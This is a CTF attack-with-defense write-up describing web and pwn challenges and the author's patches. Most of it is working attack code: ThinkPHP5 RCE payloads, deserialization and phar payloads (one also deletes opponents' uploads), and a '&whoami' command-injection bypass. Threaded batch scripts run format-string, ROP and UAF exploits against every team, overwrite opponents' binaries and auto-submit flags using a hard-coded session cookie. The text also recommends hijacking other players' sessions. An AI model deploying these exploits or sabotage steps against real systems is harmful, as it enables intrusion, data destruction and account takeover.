
web1

I found four vulnerabilities in this challenge in total.

ThinkPHP5 RCE 1

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

This one can be exploited directly; the fix is as follows.

Add a regex filter at line 375 of App.php and it is fixed. This is the official fix; since I am fairly familiar with ThinkPHP I simply applied the official method.


ThinkPHP5 RCE 2

s=cat /flag&_method=__construct&method=&filter[]=system

This one passes its values via POST. I did not find an official fix, but in practice patching the one above also closes this one. To be safe I added a second layer anyway: a crude fix in Request.php.


Deserialization 1

The chain is very simple; there is not even a chain, it can be used directly. It sits in the entry file index.php.


The simple deserialization point itself is in Index.php.


Fix: I simply added a regex replacement that strips every letter, after which the sink is useless. Thinking about it, though, this approach is no better than just deleting the code.

Batch exploitation script

import requests
import re
import threading

# Target list, one "ip:port" per line.
iptables = '''39.100.119.37:10180
39.100.119.37:10380
39.100.119.37:10480
39.100.119.37:10580
39.100.119.37:10680
39.100.119.37:10780
39.100.119.37:10880
39.100.119.37:10980
39.100.119.37:11080
39.100.119.37:11180
39.100.119.37:11280
39.100.119.37:11380
39.100.119.37:11480
39.100.119.37:11580
39.100.119.37:11680
39.100.119.37:11780
39.100.119.37:11880
39.100.119.37:11980
39.100.119.37:12080
39.100.119.37:12180
39.100.119.37:12280
39.100.119.37:12380
39.100.119.37:12480'''.split('\n')

def find_flag(data):
    # first flag{...} in the response body, or None when there is none
    tmp = re.findall("flag{(.*?)}", data)
    if tmp:
        return 'flag{' + tmp[0] + '}'
    return None

def ip_log(flag):
    with open('flag1.txt', 'a') as f:
        f.write(flag + "\n")

def attack(ip):
    # the a= parameter is the base64-encoded serialized Core object
    url2 = "http://" + ip + "/?s=index/index/unse&a=Tzo0OiJDb3JlIjoxOntzOjQ6ImRhdGEiO3M6MjA6InN5c3RlbSgnY2F0IC9mbGFnJyk7Ijt9"
    response = requests.get(url2)
    flag = find_flag(response.text)
    if flag:
        ip_log(flag)
    print(ip, ":", flag)

for ip in iptables:
    t = threading.Thread(target=attack, args=(ip, ))
    t.start()

Phar deserialization

There is an upload feature and a file-read feature; it is obvious at a glance that this is phar deserialization.

Fix: I simply added a filter that blocks the phar protocol.


Phar script

<?php
// Core mirrors the class on the target; its $data is what the target's
// deserialization sink ends up executing.
class Core{
    public $data;
    public function __construct(){
        $this->data="system('cat /flag;rm rm /var/www/html/public/uploads/20200314/*');";
    }
}
$obj = new Core();
@unlink("yds.phar");
$phar = new Phar("yds.phar");
$phar->startBuffering();
// GIF89a stub so the upload's image check accepts the file
$phar->setStub("GIF89a<?php __HALT_COMPILER(); ?>");
$phar->setMetadata(new Core());
$phar->addFromString("yds.txt", "yds_is_so_beautiful");
$phar->stopBuffering();
rename('yds.phar', 'yds.gif');

Batch script

import requests
import re
import threading
from requests import session

# Target list, one "ip:port" per line.
iptables = '''39.100.119.37:10180
39.100.119.37:10380
39.100.119.37:10480
39.100.119.37:10580
39.100.119.37:10680
39.100.119.37:10780
39.100.119.37:10880
39.100.119.37:10980
39.100.119.37:11080
39.100.119.37:11180
39.100.119.37:11280
39.100.119.37:11380
39.100.119.37:11480
39.100.119.37:11580
39.100.119.37:11680
39.100.119.37:11780
39.100.119.37:11880
39.100.119.37:11980
39.100.119.37:12080
39.100.119.37:12180
39.100.119.37:12280
39.100.119.37:12380
39.100.119.37:12480'''.split('\n')

def find_flag(data):
    # first flag{...} in the response body, or None when there is none
    tmp = re.findall("flag{(.*?)}", data)
    if tmp:
        return 'flag{' + tmp[0] + '}'
    return None

def ip_log(flag):
    with open('flag1.txt', 'a') as f:
        f.write(flag + "\n")

def attack(ip):
    # upload yds.gif (the renamed phar), then read it back through phar://
    url1 = "http://" + ip + "/index.php/Index/index/upload"
    s = session()
    with open('yds.gif', 'rb') as img:
        response = s.post(url1, files={'image': img})
    url2 = "http://" + ip + "/?file=phar://uploads/" + response.text.split('.gif')[0] + '.gif'
    response2 = s.get(url2)
    flag = find_flag(response2.text)
    if flag:
        ip_log(flag)
    print(ip, ":", flag)

for ip in iptables:
    t = threading.Thread(target=attack, args=(ip, ))
    t.start()

web2

01

The competition opened web2 first. I pulled down the source and scanned it with the freshly updated D盾, which found nothing. 夜莫离 black-box tested it and found that login.php prints the flag at the bottom left of the page.


Delete that line, then write a batch script and attack directly.

02

王叹之 found /admin/index.php and fixed it. At the time I was grabbing the login.php flag by hand and writing a script, so I did not look at it. In the end I even forgot to submit the flag I had taken manually.

/admin/index.php

$uname = addslashes( $_SESSION['username']);
if ($uname =="admin"){
    system('cat /flag');
}

After the match I read the source. The exploit here: config.php reveals the username root with an empty password, so you can go straight into the database, read admin's password from the user table, log in as admin through login.php, and get the flag on the page.

03

夜莫离 saw the requests in the logs and found the variable overwrite vulnerability, but could not find a place to exploit it. I think it is exploitable, because many database-related PHP pages include config.php. I will try it locally tomorrow.

$black_list = ["_GET","_POST","_COOKIE"];
foreach ($_GET as $k => $v) {
    if ($k == $black_list){   // compares a string with an array: always false in PHP
        exit("?");
    }
    $$k = $v;                 // variable-variable write from request data
}
foreach ($_POST as $k => $v) {
    if ($k == $black_list){
        exit("?");
    }
    $$k = $v;
}

For defense, just add session to the blacklist:

$black_list = ["_GET","_POST","_COOKIE","_SESSION"];
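As an added example (not the challenge's or the author's code), a replacement for the `$$k = $v` loop that a defender would want: the page's `$k == $black_list` compares a string with an array, which is always false in PHP, so no blacklist entry ever matches; the version below uses a strict allow-list and never writes request keys into variables at all. Function and variable names are assumptions for the example.

```php
<?php
// Added example, not the challenge's code.
// Request keys are copied into a plain array instead of variables, so
// $_SESSION, $_SERVER or anything config.php defines cannot be clobbered.
// Names are checked with strict comparison against an allow-list; the
// page's "$k == $black_list" (string vs array) is always false in PHP.
function collect_params(array $src, array $allowed): array {
    $params = [];
    foreach ($src as $k => $v) {
        // in_array with $strict = true: the key must equal an allowed name exactly
        if (!is_string($k) || !in_array($k, $allowed, true)) {
            continue;                 // silently drop unexpected names
        }
        if (!is_scalar($v)) {
            continue;                 // reject ?key[sub]=... array payloads
        }
        $params[$k] = (string) $v;
    }
    return $params;
}

// Constructed request mixing legitimate and hostile keys.
$request = [
    "page"     => "2",
    "sort"     => "name",
    "_SESSION" => ["username" => "admin"],   // would have become $_SESSION
    "db_host"  => "attacker.example",        // would have shadowed a config value
];
print_r(collect_params($request, ["page", "sort"]));
```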

04

王叹之 changed the code in /upload/upload.php: it was originally a blacklist, and he turned it into a whitelist of .jpg, .png and the like, which is much safer, because a blacklist is too dangerous; there is always something that gets around it.

// original blacklist version (note "htacces" never matches the extension "htaccess")
$black_list = ["ini","htacces","php","ph3","html"];
$ext = pathinfo($name)['extension'];
$ext = strtolower($ext);
if (in_array($ext, $black_list)){
    exit("fuck you hacker;");
}
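An added example (not the challenge's or the team's code) covering both the upload check above and the `?file=` read behind the phar deserialization in web1: the extension is matched against an allow-list, the stored name is generated server-side, and reads refuse any stream wrapper and stay inside the upload directory. It assumes PHP 8 and an `uploads` directory next to the script.

```php
<?php
// Added example, not the challenge's code. Assumes PHP 8.
const UPLOAD_DIR  = __DIR__ . '/uploads';          // assumed location
const ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif'];

// Returns the server-side file name to store under, or null to reject.
// The client's name is never reused: the stored name is random and the
// extension is the allow-listed one, so .htaccess, x.php or a.php.jpg
// can never reach disk under an executable name.
function safe_upload_name(string $client_name): ?string {
    $ext = strtolower(pathinfo($client_name, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Returns file contents, or null unless the request names a plain file
// inside UPLOAD_DIR. Rejecting "://" closes phar://, compress.zlib://,
// php://filter and similar wrappers; realpath() closes ../ traversal.
function safe_read_upload(string $requested): ?string {
    if (str_contains($requested, '://') || str_contains($requested, "\0")) {
        return null;                    // stream wrapper or NUL byte
    }
    $name = basename($requested);       // drop any directory component
    $real = realpath(UPLOAD_DIR . '/' . $name);
    $base = realpath(UPLOAD_DIR);
    if ($real === false || $base === false || !str_starts_with($real, $base . '/')) {
        return null;                    // missing, or escaped the directory
    }
    if (!is_file($real)) {
        return null;
    }
    return file_get_contents($real);
}

// Constructed inputs: each one exercises a different check above.
var_dump(safe_upload_name('avatar.PNG'));          // allow-listed extension
var_dump(safe_upload_name('shell.php'));            // rejected by the allow-list
var_dump(safe_upload_name('.htaccess'));            // extension "htaccess" is not allowed
var_dump(safe_read_upload('phar://uploads/x.gif')); // rejected by the wrapper check
var_dump(safe_read_upload('../../../flag'));        // confined to UPLOAD_DIR
```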

05

  • file_operate.php contains `echo file_get_contents($item[1]);`, which may allow arbitrary file read. Fix it with an if, quick and crude: ban "flag". In practice the WAF already bans that fairly thoroughly.

  • The file-read operations in upload.php are the same story.

Dirty trick: there are many sessions in the logged requests; you can swap in someone else's session on the platform and log straight into their pages.

web3

I did a light audit of the html directory:

01

readme.md contains a one-line webshell, and .htaccess maps it to PHP like this:

AddType application/x-httpd-php .html .md

02

A deserialization point that 王叹之 found during the audit. When I tried to exploit it, it did not work, which is strange; normally it should. It may also be that I tried too late and everyone had already patched it.

class home{
    public $method;
    public $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
    function __destruct(){
        var_dump($this->method);
        ($this->method)($this->args);   // calls an attacker-chosen callable when the object is destroyed
    }
}
$a=$_REQUEST['a'];
unserialize($a);
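As an added example (not the challenge's code), the same `home` class with the sink changed so that request data can never instantiate it: `allowed_classes => false` turns every serialized object into `__PHP_Incomplete_Class`, whose magic methods PHP never invokes. The serialized input is constructed here with a harmless callable.

```php
<?php
// Added example, not the challenge's code.
class home {
    public $method;
    public $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
    function __destruct() {
        ($this->method)($this->args);   // the gadget: callable + argument
    }
}

// Constructed input of the shape the sink accepts; the temporary object's
// __destruct runs strlen("abc") here, which is harmless.
$input = serialize(new home('strlen', 'abc'));

// Hardened sink: no class may be instantiated from the payload, so the
// result is an __PHP_Incomplete_Class and __destruct is never called.
$obj = unserialize($input, ['allowed_classes' => false]);
var_dump($obj instanceof __PHP_Incomplete_Class);

// If structured client data is really needed, use a format that cannot
// carry objects at all; json_decode() with $associative = true yields arrays.
$data = json_decode('{"method":"strlen","args":"abc"}', true);
var_dump(is_array($data));
```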

03

There are several command execution points here.

function waf($str){
    // strips three shell metacharacters; everything else passes through
    $str=str_replace(' ','',$str);
    $str=str_replace(';','',$str);
    $str=str_replace('|','',$str);
    return $str;
}
function ping($host){
    $host=waf($host);
    var_dump($host);
    system("ping -c 1 $host");   // $host is interpolated unquoted into the shell command
}
if(isset($_REQUEST[1]))
    ping($_REQUEST[1]);

The WAF forgot to filter one character: &

127.0.0.1&whoami
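An added example (not the challenge's code) of the `ping()` handler with the metacharacter-stripping `waf()` replaced by validation: the input must be an IP address or a plain hostname, and it is quoted with `escapeshellarg()` so the shell sees it as data. Function names are assumptions for the example.

```php
<?php
// Added example, not the challenge's code.
// Stripping a list of characters is the approach that missed "&" on the
// page; validating the value and quoting it leaves nothing for the shell.
function validate_host(string $host): ?string {
    $host = trim($host);
    // Accept a literal IPv4 or IPv6 address ...
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        return $host;
    }
    // ... or a hostname of dot-joined labels [A-Za-z0-9-] (no leading "-",
    // so the value can never be parsed as a ping option either).
    $label = '[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?';
    if (preg_match('/\A(?=.{1,253}\z)(?:' . $label . '\.)*' . $label . '\z/i', $host)) {
        return $host;
    }
    return null;
}

function safe_ping(string $host): ?string {
    $valid = validate_host($host);
    if ($valid === null) {
        return null;                  // reject instead of "cleaning" the input
    }
    // escapeshellarg() single-quotes the argument: &, ;, |, newlines stay data
    $out = shell_exec('ping -c 1 ' . escapeshellarg($valid));
    return is_string($out) ? $out : null;
}

// Constructed inputs: a normal address, a hostname, and the page's bypass.
var_dump(validate_host('127.0.0.1'));
var_dump(validate_host('example.com'));
var_dump(validate_host('127.0.0.1&whoami'));   // fails both checks
```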

04

User.php

There is a weak password in here:

function Login(){
    if (!empty($_POST['username']) and !empty($_POST['password'])){
        $username=$_POST['username'];
        $password=md5($_POST['password']);
        // hard-coded credential: 21232f297a57a5a743894a0e4a801fc3 is md5("admin")
        if($username=='admin' && $password=='21232f297a57a5a743894a0e4a801fc3'){
            // $data = mysql_fetch_assoc($result);
            $_SESSION['username']=$username;
            header("Location: ./index.php?c=User&a=home");
        }else{
            exit("password error!");
        }
    }
}

pwn1

Brute-forcing the stack frame.

system backdoor:

#!/usr/bin/python2
# -*- coding:utf-8 -*-
from pwn import *
import time, signal
from submit_flag import submit_flag as sf # for fast
interval = 60
execve_file = './pwn'
libc_file = '/lib/x86_64-linux-gnu/libc.so.6'
# libc_file = './libc-2.27.so'
scope = [i + 1 for i in range(25)]       # team numbers
filter = [1,2 , 13]                       # teams to skip
def end_handle(signum=None, stack=None): exit(0)
for sig in [signal.SIGINT, signal.SIGHUP, signal.SIGTERM]: signal.signal(sig, end_handle)
context.arch = 'amd64'
# context.arch = 'i386'
context.log_level = 'debug'
elf = ELF(execve_file)
libc = ELF(libc_file)
import string
number = string.digits
print(number)
while(True):
    for v in scope:
        if(v not in filter):
            print('team %02d' %(v))
            time.sleep(1)
            try:
                sh = remote('39.100.119.37', '4%02d80' % (v))
                result = 'a' * 0x100
                tail = -1
                i = 0
                n = 0
                # reconnect until the leaked byte after our input looks usable
                while(i < 0x40):
                    sh.sendline('a')
                    result = sh.recvuntil(' input')
                    sh.sendline('a')
                    result = sh.recvuntil(' input')
                    tail = result.rfind('a') + 1
                    n = ord(result[tail])
                    if(n < 0x30 or n > 0x80 or number.find(result[tail + 1]) != -1 ):
                        sh.close()
                        sh = remote('39.100.119.37', '4%02d80' % (v))
                    else:
                        break
                    i += 1
                if(i == 0x40):
                    sh.close()
                    continue
                i = 0
                # keep feeding input until byte 28 of the echo is '1', then send '-'
                while(i < 0x100):
                    if(ord(result[28]) != 0x31):
                        sh.sendline('a')
                        result = sh.recvuntil(' input')
                        tail = result.rfind('a') + 1
                        # print(result[tail])
                    else:
                        sh.sendline('-')
                        break
                    i += 1
                if(i == 0x100):
                    sh.close()
                    continue
                sh.sendline('cat flag')
                sh.recvuntil('flag')
                flag = 'flag' + sh.recvrepeat(1)
                print(flag)
                # try:
                sf(flag, 4)
                sh.close()
            except EOFError as e: sh.close()
    # time.sleep(interval)

233 backdoor:

#!/usr/bin/python2
# -*- coding:utf-8 -*-
from pwn import *
import time, signal
from submit_flag import submit_flag as sf # for fast
interval = 60
execve_file = './pwn'
libc_file = '/lib/x86_64-linux-gnu/libc.so.6'
# libc_file = './libc-2.27.so'
scope = [i + 1 for i in range(25)]       # team numbers
filter = [1,2 , 3, 4, 5, 13]              # teams to skip
def end_handle(signum=None, stack=None): exit(0)
for sig in [signal.SIGINT, signal.SIGHUP, signal.SIGTERM]: signal.signal(sig, end_handle)
context.arch = 'amd64'
# context.arch = 'i386'
context.log_level = 'debug'
elf = ELF(execve_file)
libc = ELF(libc_file)
import string
number = string.digits
print(number)
while(True):
    for v in scope:
        if(v not in filter):
            print('team %02d' %(v))
            time.sleep(1)
            try:
                sh = remote('39.100.119.37', '4%02d80' % (v))
                result = 'a' * 0x100
                tail = -1
                i = 0
                all = 0x100
                # reconnect until the byte after our input is '3'
                while(i < all):
                    sh.sendline('a')
                    result = sh.recvuntil(' input')
                    sh.sendline('a')
                    result = sh.recvuntil(' input')
                    sh.sendline('a')
                    result = sh.recvuntil(' input')
                    tail = result.rfind('a') + 1
                    n = ord(result[tail])
                    if(result[tail + 1] != '3' ):
                        sh.close()
                        print(result[tail + 1])
                        # time.sleep(1)
                        sh = remote('39.100.119.37', '4%02d80' % (v))
                    else:
                        break
                    i += 1
                if(i == all):
                    sh.close()
                    continue
                i = 0
                # keep feeding input until byte 28 of the echo is '3', then send '2'
                while(i < 0x1000):
                    if(result[28] != '3'):
                        sh.sendline('a')
                        result = sh.recvuntil(' input')
                        tail = result.rfind('a') + 1
                        # print(result[tail])
                    else:
                        print(result)
                        print(result[tail])
                        sh.send('2')
                        break
                    i += 1
                if(i == 0x1000):
                    sh.close()
                    continue
                # stage 1: leak puts@got through puts@plt, return to gift
                layout = [
                    0,
                    0x0000000000400ce3,
                    elf.got['puts'],
                    elf.plt['puts'],
                    elf.symbols['gift'],
                ]
                time.sleep(10)
                sh.recv()
                sh.send('a' * 0x40 + flat(layout))
                libc_addr = u64(sh.recvn(6) + '\0\0') - libc.symbols['puts']
                success('libc_addr: ' + hex(libc_addr) )
                # stage 2: system("/bin/sh")
                layout = [
                    0,
                    0x0000000000400ce3,
                    libc_addr + libc.search('/bin/sh\0').next(),
                    libc_addr + libc.symbols['system'],
                    elf.symbols['gift'],
                ]
                sh.send('a' * 0x40 + flat(layout))
                sh.sendline('cat flag')
                sh.recvuntil('flag')
                flag = 'flag' + sh.recvrepeat(1)
                print(flag)
                # try:
                sf(flag, 4)
                sh.close()
            except EOFError as e: sh.close()
    # time.sleep(interval)

pwn2

pwn2 has quite a few bugs:

  while ( v1 )
  {
    read(0, &buf, 0x80uLL);                 // 0x80 bytes read into a smaller stack buffer
    printf((const char *)&buf, &buf);       // user input used directly as the format string
    --v1;
  }

Format string plus stack overflow.

UAF:

  printf("index>> ", a2);
  v2 = sub_11F2();
  v5 = v2;
  v3 = *((_QWORD *)&unk_202100 + 2 * v2);
  if ( v3 )
  {
    free(*((void **)&unk_202100 + 2 * v5));  // pointer is freed but never cleared in the table
    LODWORD(v3) = puts("dele success");
  }
  return v3;

Two exploit scripts. Format string plus stack overflow:

#coding=utf-8
from pwn import *
import requests
import json
local = 1
exec_file="./pwn"
context.binary=exec_file
context.terminal=["tmux","splitw","-h"]
elf=ELF(exec_file,checksec = False)
def get_base(a):
    text_base = a.libs()[a._cwd+a.argv[0].strip('.')]
    for key in a.libs():
        if "libc.so.6" in key:
            return text_base,a.libs()[key]
def debug():
    text_base,libc_base=get_base(a)
    script="set $text_base="+str(text_base)+'\n'+"set $libc_base="+str(libc_base)+'\n'
    script+='''
    b *($text_base+0x0000000000012E7)
    '''
    gdb.attach(a,script)
def fuck(address):
    # debugging helper: name the global that holds this address
    n = globals()
    for key,value in n.items():
        if value == address:
            return success(key+" ==> "+hex(address))
def subflag(flag):
    # submit the flag to the platform API
    # headers = {'Content-Type': 'application/json'}
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36",
        "Accept": "application/json",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9",
        "CSRF-Token":'cef74a1cbd40a379d2e024d4d7e87ca909c0a8ce28439155fb895a03a7a560dc',
        'Content-Type': 'application/json',
        'Cookie': "session=2f70504d-d929-484b-b47a-a6e66446166c"
    }
    url = "http://39.100.119.37:8001/api/v1/challenges/attempt"
    data = {"challenge_id":5,"submission":flag}
    r = requests.post(url,headers=headers,data = json.dumps(data))
    print(r.text)
# menu helpers left over from the heap script; not used by exp() below
def menu(idx):
    a.sendlineafter("",str(idx))
def add(size,content):
    menu(1)
    a.sendlineafter("",str(size))
    a.sendafter("",content)
def delete(idx):
    menu()
    a.sendlineafter("",str(idx))
def show(idx):
    menu()
    a.sendlineafter("",str(idx))
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6",checksec = False)
def exp(ip,p):
    a=remote(ip,p)
    times = 2
    a.sendafter("name:\n",'A')
    a.sendlineafter("Darkness is coming\n",str(1))
    a.sendafter("times >> ",str(times)+'\n')
    #debug()
    # round 1: format string leaks canary, text base and libc base
    payload = '%13$pA%15$pB%27$pC'
    a.send(payload)
    canary = eval(a.recvuntil("A",drop=True))
    text_base = eval(a.recvuntil("B",drop=True))-0x17b4
    libc_base = eval(a.recvuntil("C",drop=True))-240-libc.symbols['__libc_start_main']
    # round 2: stack overflow with the canary restored, then ret2libc
    payload = 'A'*0x28+p64(canary)
    payload += p64(0)
    payload +=p64(0x0000000000001863+text_base)
    payload += p64(libc_base+next(libc.search("/bin/sh")))
    payload += p64(libc_base+libc.symbols["system"])
    sleep(1)
    a.send(payload.ljust(0x80,'\x00'))
    a.sendline("cat flag")
    a.recvuntil("flag")
    flag = "flag"+a.recvuntil("}")
    a.close()
    return flag
if __name__ == "__main__":
    port=[]
    for i in range(2,25):
        if i == 11:
            continue
        port.append("5"+str(i).rjust(2,'0')+"80")
    ip="39.100.119.37"
    while 1:
        for i in port:
            try:
                data = exp(ip,i)
                print data
                subflag(data)
            except Exception as e:
                print e
                continue
        print "=====================done======================"
        sleep(120)

UAF exploit script:

#coding=utf-8
from pwn import *
import requests
import json
local = 1
exec_file="./pwn"
context.binary=exec_file
context.terminal=["tmux","splitw","-h"]
elf=ELF(exec_file,checksec = False)
context.log_level="debug"
def get_base(a):
    text_base = a.libs()[a._cwd+a.argv[0].strip('.')]
    for key in a.libs():
        if "libc.so.6" in key:
            return text_base,a.libs()[key]
def debug():
    text_base,libc_base=get_base(a)
    script="set $text_base="+str(text_base)+'\n'+"set $libc_base="+str(libc_base)+'\n'
    script+='''
    b *($text_base+0x0000000000012E7)
    '''
    gdb.attach(a,script)
def fuck(address):
    # debugging helper: name the global that holds this address
    n = globals()
    for key,value in n.items():
        if value == address:
            return success(key+" ==> "+hex(address))
def subflag(flag):
    # submit the flag to the platform API
    # headers = {'Content-Type': 'application/json'}
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36",
        "Accept": "application/json",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9",
        "CSRF-Token":'cef74a1cbd40a379d2e024d4d7e87ca909c0a8ce28439155fb895a03a7a560dc',
        'Content-Type': 'application/json',
        'Cookie': "session=2f70504d-d929-484b-b47a-a6e66446166c"
    }
    url = "http://39.100.119.37:8001/api/v1/challenges/attempt"
    data = {"challenge_id":5,"submission":flag}
    r = requests.post(url,headers=headers,data = json.dumps(data))
    print(r.text)
a=""
def menu(idx):
    a.sendlineafter("Your Choice>> ",str(idx))
def add(idx,size,content):
    menu(1)
    a.sendlineafter("index>> ",str(idx))
    a.sendlineafter("size>> ",str(size))
    a.sendafter("name>> ",content)
def delete(idx):
    menu(2)
    a.sendlineafter("index>> ",str(idx))
def show(idx):
    menu(5)
    a.sendlineafter("index>> ",str(idx))
def edit(idx,content):
    menu(3)
    a.sendafter("name>> ",content)
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6",checksec = False)
def exp(ip,p):
    global a
    a = remote(ip,p)
    a.sendlineafter("name:\n","1")
    a.sendlineafter("ing\n","3")
    add(0,0x90,'A')
    add(1,0x68,'A')
    add(2,0x68,'A')
    delete(0)
    show(0)      # show after free: the stale pointer leaks the unsorted-bin fd
    libc_base=u64(a.recvuntil("\n",drop=True)+'\x00\x00')-libc.symbols["__malloc_hook"]-0x10-88
    print hex(libc_base)
    delete(1)
    delete(2)
    delete(1)    # fastbin double free through the stale pointer
    add(3,0x68,p64(libc_base+libc.symbols["__malloc_hook"]-0x23))
    add(4,0x68,p64(libc_base+libc.symbols["__malloc_hook"]-0x23))
    add(5,0x68,p64(libc_base+libc.symbols["__malloc_hook"]-0x23))
    add(6,0x68,'A'*0x13+p64(libc_base+0xf1147))   # __malloc_hook -> one_gadget
    menu(1)
    a.sendlineafter("index>> ",str(7))
    a.sendlineafter("size>> ",str(0x6))
    a.sendline("echo 1 > ./pwn")
    a.sendline("cat flag")
    a.recvuntil("flag")
    flag = "flag"+a.recvuntil("}")
    a.close()
    return flag
# a.interactive()   # leftover from manual testing; at import time a is "" so it is disabled
#exp("39.100.119.37",52380)
if __name__ == "__main__":
    port=[]
    for i in range(2,25):
        if i == 11:
            continue
        port.append("5"+str(i).rjust(2,'0')+"80")
    ip="39.100.119.37"
    while 1:
        for i in port:
            try:
                data = exp(ip,i)
                print data
                subflag(data)
            except Exception as e:
                print e
                continue
        print "=====================done======================"
        sleep(120)


http://www.lbrq.cn/news/760447.html
